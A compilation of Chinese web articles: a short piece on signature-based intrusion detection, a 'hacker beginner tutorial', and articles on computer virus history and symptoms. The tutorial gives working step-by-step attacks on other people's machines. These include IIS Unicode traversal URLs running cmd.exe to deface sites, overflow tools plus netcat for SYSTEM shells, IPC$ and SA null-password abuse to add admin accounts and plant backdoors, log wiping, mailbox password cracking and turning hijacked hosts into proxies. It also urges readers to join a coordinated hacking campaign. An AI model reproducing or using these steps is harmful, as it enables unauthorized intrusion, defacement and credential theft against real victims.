    目前大多数的入侵检测系统是有局限性的，因为它们使用特征码去进行辨别是否存在攻击行为。这些系统采用这种方式对特定的攻击模式进行监视。它们基于贮存在其数据库里的识别信息：类似于防病毒软件检查已知病毒的方式。这意味着这些系统只能检测他们已经编入识别程序的特定的攻击。因为“瞬时攻击”是新出现的，尚未被广泛认识，所以在新的特征码被开发出来，并且进行安装和配置等这些过程之前，它们就能绕过这些安全系统。实际上，仅仅需要对已知的攻击方式进行稍微的修改，这些系统就不会认识这些攻击方式了，从而给入侵者提供了避开基于特征码的防御系统的手段。

    从新的攻击的发动到开发新的特征码的这段时间，是一个危险的“机会之窗”，许多的网络会被攻破。这时候许多快速的入侵工具会被设计开发出来，网络很容易受到攻击。下图举例说明了为什么大多数的安全产品在该时期内实际上是无效的。CERT组织研制的这个图表说明了一个网络攻击的典型的生命周期。该曲线的波峰就在攻击的首次袭击之后，这是大多数安全产品最终开始提供保护的时候。然而“瞬时攻击”是那些最老练的黑客在最早期阶段重点展开的。

    同时，现在那些快速进行的攻击利用了广泛使用的计算机软件中的安全漏洞来造成分布更广的破坏。仅仅使用几行代码，他们就能编写一个蠕虫渗透到计算机网络中，通过共享账号克隆自己，然后开始攻击你的同伴和用户的网络。使用这种方式，在厂商开发出特征码并将其分发到用户的这段时间内，“尼姆达蠕虫”仅仅在美国就传播到了超过100,000的网络站点。这些分发机制使“瞬间攻击”像SirCam和Love Bug两种病毒分别席卷了230万和4000万的计算机，而不需要多少人为干预。其中有些攻击甚至还通过安装一个后门来为以后的破坏建立基础，该后门允许对手、黑客和其他未获授权的用户访问一个组织重要的数据和网络资源。

作者：
来源：天极yesky


黑客入门教程

《一键清理系统垃圾》

黑客入门教程

由于网上很多朋友问我怎么入侵别人的机器，所以整理了一些我认为容易学的漏洞入侵方法，希望能给
初学者一些帮助，下面讲的内容很简单，高手就不用浪费时间看了，：）

（1） UNICODE漏洞入侵
“Uicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。
第一步，运行RANGSCAN扫描器，会出现扫描窗口，在最上面有两个from的横框，这是让你填一段IP范围
的。在第一个框里填入启始域（打个比方，比如你要扫192.168.0.1至192.168.0.255）那么你在第一个
框里就填入192.168.0.1，在to 后面的框里填入192.168.0.255 意思就是扫192.168.0.0至192.168.0.255
这段范围里有UNICODE漏洞的机器。接着在中间有一个添加的横框，是要填入内容的如：
/scripts/..%c0%af../winnt/system32/cmd.exe
这句话的意思是扫描有 %c0%af 漏洞的机器，对象一般是英文的WIN2000机。
我们把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里，再按一下添加。再按“扫描”。就看
到RANGSCAN开始扫了。这时就要看你选的IP范围有漏洞的机器多不多了，如果你选的IP范围好，呵，
很快在扫描结果框里就会显示扫到的漏洞主机
如192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe
意思是192.168.0.111主机有 %c0%af 漏洞，
目标有了，我们马上打开浏览器。在网址栏里输入：
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 回车
意思是查看机器里C盘的根目录。一般情况下，我们都可以在浏览器里看到类似如：
Directory of c:\
2002-03-13 03:47p 289 default.asp
2002-02-11 03:47p 289 default.htm
2002-03-09 04:35p <DIR> Documents and Settings
2002-02-11 03:47p 289 index.asp
2002-02-11 03:47p 289 index.htm
2002-05-08 05:19a <DIR> Inetpub
2002-01-19 10:37p <DIR> MSSQL7
2002-03-09 04:22p <DIR> Program Files
2002-01-23 06:21p <DIR> WINNT
4 File(s) 1,156 bytes
5 Dir(s) 2,461,421,568 bytes free
------------------------------
的目录列表。也会碰到看不到文件的空目录。
好，我们成功看到了机器里的C盘了。
我们在浏览器里输入：
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set 回车
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ON
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=192.168.0.111
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=192.168.0.111
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN
PATH_TRANSLATED=c:\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Fa
-----------------
哈，我们看到了机器设置内容了，我们找找，主要看PATH_TRANSLATED=c:\inetpub\wwwroot
意思是他的主页存放在c:\inetpub\wwwroot的目录里，知道就好办了。
我们用命令：
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot回车
我们就可以看到c:\inetpub\wwwroot目录里的文件了，一般都有default.asp, default.htm , index.htm, index.asp,等等。
我们以目录里有index.asp做例子。
我们先要做的是把文件的只读属性解除掉，很多管理员都把文件设置只读。
我们用命令：
192.168.0.111/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp 回车
当看到下面的英文
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
恭喜你，你可以改他的网页了。
----------------------------------------
但如果你看到下面的英文就不成功，只好换其他机器了。
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access denied - C:\inetpub\wwwroot\index.asp
-----------------------------
继续。现在用ECHO改网页的内容。
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+网站有漏洞+> c:\inetpub\wwwroot\index.asp 回车
当看到
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
的提示，你已经改了他的网页了，呵呵，你想改成什么字也行。只要把命令中的中文换成你自己的中文
就行了。

英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
中文WIN2000
/scripts/..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c1%1c../winnt/system32/cmd.exe
WIN NT4
/scripts/..%c1%9c../winnt/system32/cmd.exe
英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe
通用代码：/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

（2） Windows2000输入法漏洞
先用端口扫描器扫描开放3389的机器，然后用终端客户端程序进行连接，用CTRL+SHIFT快速切换输入法
，切换至全拼，这时在登录界面左下角将出现输入法状态条，在输入法状态条上按鼠标右键。选择
“帮助” —— “输入法指南” —— “选项”。（如果发现“帮助”呈灰色，放弃，因为对方很可能
发现并已经补上了这个漏洞。）按右键，选择“跳转到URL”，输入：c:\winnt\system32在该目录下找
到“net.exe”，为“net.exe”创建一个快捷方式，右键点击该快捷方式，在“属性” —“目标”
—c:\winnt\system32\net.exe 后面空一格，填入“user guest /active :yes”。 点击“确定”
（目的是，利用“net.exe”激活被禁止使用的guest账户）运行该快捷方式。（此时你不会看到运行状
态，但guest用户已被激活。）然后重复操作上面的，在 “属性” —— “目标”—— c:\winnt\system32\net.exe
后面空一格，填入localgroup administrators guest /add（这一步骤目的是，利用“net.exe”
将guest变成系统管理员。）再次登录终端服务器，以“guest”身份进入，此时guest已是系统管理员，
已具备一切可执行权及一切操作权限。现在，我们可以像操作本地主机一样，控制对方系统。
（3） idq溢出漏洞
要用到3个程序，一个Snake IIS IDQ 溢出程序GUI版本，一个扫描器，还有NC。
首先扫描一台有IDQ漏洞的机器，然后设置Snake IIS IDQ 溢出程序，在被攻击IP地址后面写上对方的
IP.端口号一般不需要改动，软件的默认绑定CMD.EXE的端口是813.不改了.用默认的，左面选择操作
系统类型，随便选一个，我们选IIS5 English Win2k Sp0吧，点击IDQ溢出~~OK~~出现发送Shellcode
成功的提示了，然后我们用NC来连接。
进入MS-DOS。进入“nc”的目录。然后：nc --v IP 813
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK
c:\>

看来没成功. 别灰心，在来一次，换用IIS5 English Win2k Sp1试试。
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
哈哈，终于上来啦，你现在可是system权限，下面该怎么做就看你的啦。

（4）IDA溢出漏洞
所用程序：idahack
进入MS-DOS方式（假设idq.exe在c:\下）
c:\idahack.exe
运行参数：c:\idahack <host> <hostport> <hosttype> <shellport>
chinese win2k : 1
chinese win2ksp1: 2
chinese win2ksp2: 3
english win2k : 4
english win2ksp1: 5
english win2ksp2: 6
japanese win2k : 7
japanese win2ksp1: 8
japanese win2ksp2: 9
korea win2k : 10
korea win2ksp1: 11
korea win2ksp2: 12
chinese nt sp5 : 13
chinese nt sp6 : 14

c:\idahack 127.0.0.1 80 1 80
connecting...
sending...
Now you can telnet to 80 port
Good luck &#61514;
好，现在你可以telnet它的80端口了，我们用NC来连接。
C:\nc 127.0.0.1 80

Microsoft Windows 2000 [Version 5.00.2195]
（C）版权所有 1985-1998 Microsoft Corp
C:\WINNT\system32>
OK，现在我们现在上来了，也可IDQ一样是SYSTEN权限，尽情的玩吧。

（5）.printer漏洞
这个漏洞，我们用两个程序来入侵。iis5hack和nc。
C:\>iis5hack
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p

usage: D:\IIS5HACK.EXE <Host> <HostPort> <HostType> <ShellPort>
用法: D:\IIS5HACK <溢出的主机> <主机的端口> <主机的类型> <溢出的端口>
chinese edition:　0
chinese edition, sp1: 1
english edition:　2
english edition, sp1: 3
japanese edition:　4
japanese edition, sp1: 5
korea edition:　6
korea edition, sp1: 7
mexico edition:　8
mexico edition, sp1: 9

c:\>iis5hack 127.0.0.19 80 1 119
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
Listn: 80

connecting...
sending...
Now you can telnet to 3739 port
good luck :)

溢出成功！
c:\>nc 127.0.0.19 119
http://www.sunx.org

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

OK，我们又成功取得system权限！玩吧。

（6）139端口入侵
我们先确定一台存在139端口漏洞的主机。用扫描工具扫描！比如SUPERSCAN这个端口扫描工具。
假设现在我们已经得到一台存在139端口漏洞的主机，我们要使用nbtstat -a IP这个命令得到用户的
情况！现在我们要做的是与对方计算机进行共享资源的连接。
用到两个NET命令，下面就是这两个命令的使用方法
NET VIEW?
作 用：显示域列表、计算机列表或指定计算机的共享资源列表。?
命令格式：net view [\\computername | /domain[:domainname]]?
参数介绍：?
<1>键入不带参数的net view显示当前域的计算机列表。?
<2>\\computername 指定要查看其共享资源的计算机。?
<3>/domain[:domainname]指定要查看其可用计算机的域?

NET USE?
作用：连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。?
命令格式：net use [devicename | *] [\\computername\sharename[\volume]]?
[password | *]] [/user:[domainname\]username] [[/delete] |?
[/persistent:{yes | no}]]?
参数介绍：?
键入不带参数的net use列出网络连接。?
devicename指定要连接到的资源名称或要断开的设备名称。?
\\computername\sharename服务器及共享资源的名称。?
password访问共享资源的密码。?
*提示键入密码。 /user指定进行连接的另外一个用户。?
domainname指定另一个域。?
username指定登录的用户名。?
/home将用户连接到其宿主目录?
/delete取消指定网络连接。?
/persistent控制永久网络连接的使用。?
C:\net use \\IP
C:\net view \\IP
我们已经看到对方共享了他的C，D，E三个盘
我们要做的是使用NBTSTAT命令载入NBT快取.
c:\>nbtstat –R 载入NBT快取
c:\>nbtstat –c 看有无载入NBT快取
现在我们已经得到的139端口漏洞的主机IP地址和用户名，现在就该是我们进入他计算的时候了，
点击开始---查找--计算机，将刚才找到的主机名字输入到上面，选择查找，就可以找到这台电脑了！
双击就可以进入，其使用的方法和网上领居的一样。

（7）IPC入侵
所有程序：流光
开始：在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。输入我们要破解的
IP段，我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令，
这样可以加快扫描的速度 ：）填入IP，选择扫描NT/98主机。在“辅助主机”那里的“IPC$主机”
前面打勾,然后在菜单了选“探测”，，扫描出结果以后，“IPC$主机”，选中后按“CTRL+F9”
就开始探测IPC用户列表。会出现“IPC自动探测”
的窗体，把那两个选项都选了，然后点“选项” 为了加快弱口令扫描速度，这里的两个选项我们可以
全部取消记住。然后点“确定”出来后点“是”就开始探测了。一会儿，结果出来了。比如我们探测
出了用户名为“admin”的管理员，密码为“admin”，现在我们用命令提示符，熟悉下命令吧，输入:
net use　file://对方ip/ipc$ "密码"　/user:"用户名" || 建立远程连接
copy icmd.exe file://对方ip/admin$ 　 ||　admin$是对方的winnt目录
net time file://对方IP/　　 ||　看看对方的本地时间
at file://对方ip/ 启动程序的时间　启动程序名 启动程序的参数　||　用at命令来定时启动程序
telnet 对方ip　端口

我们也可以改网页：
net use \\ip\ipc$ "admin" /uesr:"admin" 回车。
出现“命令成功完成”。
然后输入“dir \\ip\c$\*.*”
看到C:下所有内容。现在我们来改主页。一般主页放在c:\inetpub\wwwroot里面
输入“dir \\ip\c$\inetpub\wwwroot\*.*”。就可以看到index.htm或index.asp或default.htm或
default.asp.这些就是主页了，假如你黑页在C:下，就输入"copy 主页文件 \\ip\c$\inetpub\wwwroot"
覆盖原文件这样就行了，简单吧？

日志清除，断开连接 ：
我们copy cl.exe ，clear.exe 上去，再执行，就可以清除日志，比如clear all ：清除所有的日志。
然后在断开连接：net use file://ip/ipc$ /delete

（8）超管SA空密码漏洞
使用的工具:流光IV
启动流光，按Ctrl+R。出现扫描设置对话框，设置扫描IP段，并且选择扫描的类型为SQL。点击“确定”
，进行扫描，假设我们取得主机：127.0.0.1，然后点击“工具” —— SQL远程命令（或者Ctrl+Q），
填入主机IP（127.0.0.1）、用户（sa）、密码（空）点击“连接”，出现远程命令行的界面。
net user heiying heiying1 /add　　填加一个heiying的帐号和密码heiying1
net localgroup administrators heiying /add 将我们创建的heiying帐号填加到管理组。
下面我们来做跳板：
打开cmd.exe,输入net use \\127.0.0.1\ipc$ "heiying1" /user:"heiying"命令
显示命令成功完成。
上传srv.exe：
copy srv.exe \\127.0.0.1\admin$\system32
上传ntlm.exe：
copy ntlm.exe \\127.0.0.1\admin$\system32
启动服务：
首先用net time \\127.0.0.1
看看对方主机的时间,(假如回显\\127.0.0.1 的本地时间是上午12.00)，然后我们用
at \\2127.0.0.1 12.01 srv.exe命令来启动srv.exe。等一分钟后就可以telnet了。
一分钟后在本机命令提示符中输入：
telnet Ｘ.Ｘ.Ｘ.Ｘ 99
然后我们要启动NTLM.exe：
在telnet状态下直接输入ntlm回车。
显示：windows 2000 telnet dump,by assassin,all rights reserved.done!
然后从新启动对方主机的telnet服务：net stop telnet（先关闭telnet服务）
再输入net start telnet（启动telnet服务）然后我们退出telnet，然后在命令行下输入telnet 127.0.0.1,
依照提示,接着输入用户名：heiying,密码：heiying1，回车。这样,我们的跳板就做好了，简单吧？
（上面上传的srv和ntlm等东东还有一个简便方法，全都可以直接用流光工具菜单里的种植者上传，
60秒后自动运行，不用敲命令！呵呵~~~~方便吧！）

（9）如何用流光破解信箱密码
这次的目标是21CN，运行流光IV，选择POP3主机----右键----编辑----添加，填上：pop.21cn.com，
其他的就用默认吧！不用更改，确定就行了。到下一步，还是右键-----从列表中添加------
选择一个字典，没有的到网上下载一个字典，或者到黑白网络去下载，我们用简单模式探测！
这样速度比较快，然后就等着成果吧，上次我以下就破了5个邮箱出来。

（10）frontpage进行攻击
打开您自己的Frontpage，文件菜单下选择“打开站点”，然后在文件夹框里写入
http://127.0.0.1（http://不要漏掉）。按下“打开”按钮，一会后，出现了文件夹，成功了，
现在就可以操作网页文件了。如果跳出错误信息，表示有密码，我们用以下
http://127.0.0.1/_vti_pvt/service.pwd,这是默认的密码文件，下载下来，找个解密器破密码吧！
破出来后就还可以改网页。这个只能改该网页，没什么玩的。

（11）用肉鸡做ＳＯＣＫ５代理跳板
需要软件：srv.exe，ntlm.exe，snakeSksockserver.exe，SocksCap.exe。
首先我们在命令提示符下建立IPC$管道：
net use \\127.0.0.1\ipc$ "密码" /user:帐号
通道建立好后，我们把srv.exe sss.exe ntlm.exe全部上传。
c:\copy srv.exe \\10.10.10.10\admin$
1 files copied!
c:\copy ntlm.exe \\10.10.10.10\admin$
1 files copied!
c:\copy sss.exe \\10.10.10.10\admin$
1 files copied!
复制完毕后，
看肉鸡上现在的时间：
c:\net time \\127.0.0.1
显示当前时间是 2002/4/13 晚上 09：00
我们来启动srv.exe
c:\at \\127.0.0.1 09:01 srv.exe
等到09：01后。我们来连接肉鸡：
c:\telnet 127.0.0.1 99
连上后显示：
c:\winnt\system32>
接着我们启动NTLM.exe
c:\winnt\system32>ntlm
显示：
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:\WINNT\system32>
首先我们终止srv.exe的telnet服务：
C:\WINNT\system32>net stop telnet
继续：
C:\WINNT\system32>net start telnet
再启动TELNET。
OK，我们来登陆
c:>telnet 127.0.0.1
*==========================================================
Microsoft Telnet
*==========================================================
c:>
好了，一切顺利，我们现在正式开始做代理：
c:>sss.exe -install <---------开始安装
显示：
c:>sksockserver installed!
来看看配置：
c:>sss -config show
显示：
SkServer Port = 1813　<----开放服务的端口 ,我们记着这个1813端口哦
SkServer StartType: 3 - Manual　 <---服务启动方式
SkServer Enable Client Set Num:0　<---客户端的项目个数
SkServer Pass SkServer Number:0　<---经过SkServer的项目个数

来启动服务：
c:>net start skserver
提示你正在启动，并且完成。
来检查一下是不是启动了：
c:>net start　　　<-----------看看启动的服务列表
These Windows 2000 services are started:

Print Spooler
Server
Snake SockProxy Service <---------------就是它，呵呵!
System Event Notification
TCP/IP NetBIOS Helper Service
Telephony
Telnet
The command completed successfully.

c:>_
好了，到这里我们已经做好了一个socks5代理了，我们自己的哦.OK，下面我们用sockscap来使用我们
做代理。
安装好SocksCap后，我们在桌面上打开SocksCap V2，点开File选项选Settings...弹出卡片，在
SOCKS Server里面我们填肉鸡的IP：127.0.0.1，PortT填默认的1813端口，下面的我们选socks version 5，
呵呵，和 Attempt local then remot,这是域名解析的顺序，先本地，然后才远程。设置完了点“确定”
我们就可以使用了，添加应用程序到sockscap里面，点开那个"new"按钮，会弹出一个卡片，
Profile name ：程序名，随便写。
Command Line: 命令行，点后面的Browse...找到你的程序路径
Working:填好上面那个，这个就自动加上.
这样我们就把程序加到SocksCap里面了。
现在们可以双击里面的程序来使用，也可以选住程序在点"Run"来运行。

好了，终于写完了，上面的内容都很简单，很适合初学者，还望高手们不好见笑，刚好听说这次5.1有很多联盟有所行动，希望上面的内容能教会一部分人，少走弯路，让更多的人参与这次行动。UNIX和LINUX由于自己的功力也还不够，还差很远，所以还不敢写。


计算机病毒

《一键清理系统垃圾》

计算机病毒

   根据众多高手的见解，总结如下：
   计算机病毒类似于生物病毒，它能把自身依附着在文件上或寄生在存储媒体里，能对计算机系统进行各种破坏；同时有独特的复制能力，能够自我复制；具有传染性可以很快地传播蔓延，当文件被复制或在网络中从一个用户传送到另一个用户时，它们就随同文件一起蔓延开来，但又常常难以根除。与生物病毒不同的是几乎所有的计算机病毒都是人为地制造出来的，是一段可执行代码，一个程序。一般定义为：计算机病毒是能够通过某种途径潜伏在计算机存储介质（或程序）里, 当达到某种条件时即被激活的具有对计算机资源进行破坏作用的一组程序或指令集合。


计算机病毒史

《一键清理系统垃圾》

计算机病毒史

   电脑病毒的老祖宗——核心大战(core war)
   早在1949年, 距离第一部商用电脑的出现还有好几年时, 电脑先驱者德国科学家冯·诺伊曼(John Von Neumann) 在他所提出的一篇论文《复杂自动装置的理论及组织的进行》中, 就已把病毒程式的蓝图勾勒出来了, 当时绝大部份的电脑专家都无法想像这种会自我繁殖的程式是可能的。只有少数几个科学家默默地研究冯·诺伊曼所提出的概念。直到十年后, 在美国电话电报公司(AT&T) 的贝尔(Bell)实验室中，三个年轻的程序员道格拉斯·麦基尔罗伊(H, Douglas McIlroy)、 维克多·维索特斯克(Victor Vysottsky)以及罗伯特.莫里斯(Robert T. Morris)，当时三人年纪都只有二十多岁，常在工作后留在实验室里玩起他们自己创造的电子游戏，这种电子游戏叫做“核心大战(core war)“。
   附注: Robert T. Morris就是后来写了一个Worm病毒把Internet搞的天翻地覆的那个Robert T.Morris Jr.的爸爸，当时大Morris刚好是负责Arpanet网路安全。
   核心大战的玩法如下：双方各编一组再生程序，输入同一部电脑中，这两套程序在电脑的记忆系统内互相追杀,有时它们会设下一些关卡，有时会停下来修理(重新写)被对方破坏的几行指令，当它被困时，也可以把自己复制一次，逃离险境。
   这个游戏的特点，在于双方的程序进入计算机内存后，玩游戏的人只能看著屏幕上显示的战况,而不能做任何更改，一直到某一方的程序被另一方的程序完全“吃掉”为止。
   核心大战是个笼统的名称，事实上还可细分成好几种，麦基尔罗伊所写的叫“达尔文”这包含了“[物竞天择，适者生存”的意思。它的游戏规则跟以上所描述的最接近，双方以汇编语言(Assembly Language)各编一组再生程序，叫有机体(organism)，这两个“有机体”在电脑里争斗不休，直到一方把另一方杀掉而取代之，便算分出胜负。在比赛时 Morris经常击败对手。
   另外有个叫爬行者的程序(Creeper)，每一次把它读出时，它便自己复制一个副本。此外，它也会从一部电脑“爬”到另一部与其连网的电脑。很快地电脑中原有资料便被这些爬行者挤掉了。爬行者的唯一生存目地是繁殖。
   为了对付“爬行者”,有人便写出了“收割者(Reaper)”。它的唯一生存目的便是找到爬行者，把它们毁灭掉。当所有爬行者都被收割掉之后，收割者便执行程序中最后一项指令：毁灭自己，从电脑中消失。
  “侏儒(Dwarf)”并没有“达尔文”等程序那样聪明，却是个极端危险的家伙，它在内存系统中迈进，每到第五个地址(address)便把那里所储存的东西变为零，使得原来的正常程序停止。
   最奇特的就是一个叫“印普(Imp)”的战争程式了，它只有一行指令，那就是MOV 01.MOV代表“MOVE”即移动的意思。它把身处的地址中所载的“0”写(移)到下一个地址中,当印普展开行动之后，电脑中原有的每一行指令都被改为“MOV 01”。换句话说，屏光幕上留下一大堆“MOV 01”。
  “双子星(Germini)”也是个有趣的家伙，它的作用只有一个：把自己复制，送到下一百个地址后，便抛弃掉“正本”。
   从双子星衍生出一系列的程序“牺牲者(Juggeraut)”把自己复制后送到下十个地址之后，而“大雪人(Bigfoot)”则把正本和复制品之间的地址定为某一个大质数，想抓到大雪人可是非常困难的。此外，还有全录(Xerox)柏路阿图研究中心的约翰.索殊(John F.Shoch)所写的[蠕虫](Worm)，它的目的是要控制侵入的电脑。
   1975年，美国科普作家约翰·布鲁勒尔(John Brunner)写了一本名为《震荡波骑士》(Shock Wave Rider)的书，该书第一次描写了在信息社会中，计算机作为正义和邪恶双方斗争的工具的故事，成为当年最佳畅销书之一。
   1977年夏天，托马斯·捷·瑞安(Thomas.J.Ryan)的科幻小说《P-1的春天》(The Adolescence of P-1)成为美国的畅销书，作者在这本书中描写了一种可以在计算机中互相传染的病毒，病毒最后控制了7,000台计算机，造成了一场灾难。
   1983年11月3日，弗雷德·科恩(Fred Cohen)博士研制出一种在运行过程中可以复制自身的破坏性程序，伦·艾德勒曼(Len Adleman)将它命名为计算机病毒(computer viruses)，并在每周一次的计算机安全讨论会上正式提出，8小时后专家们在VAX11/750计算机系统上运行，第一个病毒实验成功，一周后又获准进行5个实验的演示，从而在实验上验证了计算机病毒的存在。
   在那些日子里，由于电脑都没有联网，因此并不会出现小莫里斯所引起的病毒瘟疫。如果有某部电脑受到“感染”失去控制，工作人员只需把它关掉便可。但是当电脑网络逐渐成为社会结构的一部份后，一个自我复制的病毒程序便很可能带来无穷的祸害了。因此长久以来，懂的玩“核心大战”游戏的电脑工作者都严守一项不成文的规定：不对大众公开这些程序的内容。
   1983年，这项规定被打破了。科恩.汤普逊(Ken Thompson)是当年一项杰出电脑奖得奖人，在颁奖典礼上,他作了一个演讲，不但公开地证实了电脑病毒的存在，而且还告诉所有听众怎样去写自己的病毒程序。
   1984年，《科学美国人》月刊(Scientific American)的专栏作家杜特尼(A. K. Dewdney)在五月号写了第一篇讨论“核心大战”的文章，并且只要寄上两块美金，任何读者都可以收到他所写的有关写程序的纲要，在自己家中的电脑中开辟战场。
   在1985年三月份的《科学美国人》里，杜特尼再次讨论“核心大战”和病毒。在文章的开头他便说：“当去年五月有关‘核心大战’的文章印出来时，我并没有想过我所谈论的是那么严重的题目”。文中并第一次提到“病毒”这个名称。他说，意大利的罗勃吐.些鲁帝(Roberto Cerruti)和马高.么鲁顾帝(Marco Morocutti)发明了一种破坏软件的方法，他们想用病毒而不是蠕虫，来使得苹果二号电脑受感染。
   Cerruti写了一封信给杜特尼,信内说:“Marco想写一个像病毒一样的程序，可以从一部苹果电脑传染到另一部苹果电脑，可是我们没法这样做。这病毒要先使磁盘受到感染，而电脑只是媒介，这样病毒就可以从一张磁盘传染到另一张磁盘了。”
   1986年初，在巴基斯坦的拉合尔(Lahore)，巴锡特(Basit)和阿姆杰德(Amjad)两兄弟经营着一家IBM-PC机及其兼容机的小商店。他们编写了Pakistan病毒，即Brain。在一年内流传到了世界各地。
   1988年3月2日，一种苹果机的病毒发作，这天受感染的苹果机停止工作，只显示"向所有苹果电脑的使用者宣布和平的信息"。以庆祝苹果机生日。
   1988年11月2日，美国六千多台计算机被病毒感染，造成Internet不能正常运行。这是一次非常典型的计算机病毒入侵计算机网络的事件，迫使美国政府立即作出反应，国防部成立了计算机应急行动小组。这次事件中遭受攻击的包括5个计算机中心和12个地区结点，连接着政府、大学、研究所和拥有政府合同的250,000台计算机。这次病毒事件，计算机系统直接经济损失达9600万美元。这个病毒程序设计者是罗伯特·莫里斯(Robert T.Morris)，当年23岁，是在康乃尔大学攻读学位的研究生。
   罗伯特·莫里斯设计的病毒程序利用了系统存在的弱点。正由于罗伯特·莫里斯成了入侵ARPANET网的最大的电子入侵者，而获准参加康乃尔大学的毕业设计，并获得哈佛大学Aiken中心超级用户的特权。但他也因此被判3年缓刑，罚款1万美元，他还被命令进行400小时的新区服务。
   1988年底，在我国的国家统计部门发现的小球病毒是我国第一次病毒经历。
   网易电子杂志《网络时代》关于电脑病毒的出现作如下总结（已略作改动）：
   第一个计算机病毒发现于1981年，是一个苹果机病毒，但它不破坏数据。3年后，第一个与IBM PC兼容的DOS病毒出现。它会在硬盘的引导扇区和文件分配表写入大量垃圾，从而也就破坏了保存于硬盘中的数据。在它之后，更多的病毒便涌现了出来。
   直到1987-1988年，病毒仍是一个稀有事物，但这种情形被3个著名的病毒的出现改变了，它们是耶路撒冷，米开朗基罗和醉酒（stoned）。通过媒体的炒作，人们的心理充满了恐惧，开始到处寻求帮助。在这种气氛下，开发反病毒软件的公司如雨后春笋般纷纷冒出，病毒真正成为了计算机领域令人关注的问题。
   索非亚成为世界病毒的中心（1989-1992）
   在“铁幕”落下后，欧洲前社会主义国家成为了病毒云集的地方，其中尤以保加利亚为最。索非亚成为了制造新病毒的肥沃土壤。连制造病毒更有效的工具也出自这里。
   今天（梅丽莎，CIH，EVIL，.....）
   新的制造病毒的技术被不断开发出来，而随着互联网及电子邮件的广泛使用，被病毒感染事件的数目呈直线上升态势。像美丽莎，CIH等病毒都通过电子邮件附件传播，如果你双击这些附件，它们便立即开始活动。像CIH在爆发时会覆盖你的BIOS，造成你计算机完全瘫痪。


计算机病毒杂谈

《一键清理系统垃圾》

计算机病毒杂谈

    什么是病毒，怎样预防及消灭病毒？关于这个话题，众说纷纭。有人说，只要拥有了一套功能强大的杀毒软件便万事大吉；有人说，只要不上网就可抗拒病毒的侵害；还有人认为，只要定期格式化硬盘就能把病毒扼制在萌芽状态……面对种种说法，笔者感到他们把病毒看得太神奇，或者说对病毒的了解不是很清楚，对病毒的预防与剿灭不是很了解。
    认识病毒
    病毒，是指能够破坏计算机系统，影响计算机工作并能实现自我复制的一段程序或指令代码。随着计算机工业的发展，病毒程序层出不穷，到了21世纪的今天它的种类已经达到千万种。虽然病毒的类型有很多，变型的病毒更无法计算，但是就其传染对象来分只不过四类：BIOS、硬盘引导区、操作系统与应用程序病毒。
    在知道了病毒的定义与分类以后，我们再来看看电脑感染了病毒后会出现哪些异常现象：
    BIOS病毒现象
    1、开机运行几秒后突然黑屏
    2、外部设备无法找到
    3、硬盘无法找到
    4、电脑发出异样声音
    硬盘引导区病毒现象
    1、无法正常启动硬盘
    2、引导时出现死机现象
    3、执行C盘时显示“Not ready error drive A Abort，Retry，Fail?”
    操作系统病毒现象
    1、引导系统时间变长
    2、计算机处理速度比以前明显放慢
    3、系统文件出现莫名其妙的丢失，或字节变长，日期修改等现象
    4、系统生成一些特殊的文件
    5、驱动程序被修改使得某些外设不能正常工作
    6、软驱、光驱丢失
    7、计算机经常死机或重新启动
    应用程序病毒现象
    1、启动应用程序出现“非法错误”对话框
    2、应用程序文件变大
    3、应用程序不能被复制、移动、删除
    4、硬盘上出现大量无效文件
    5、某些程序运行时载入时间变长
    预防病毒
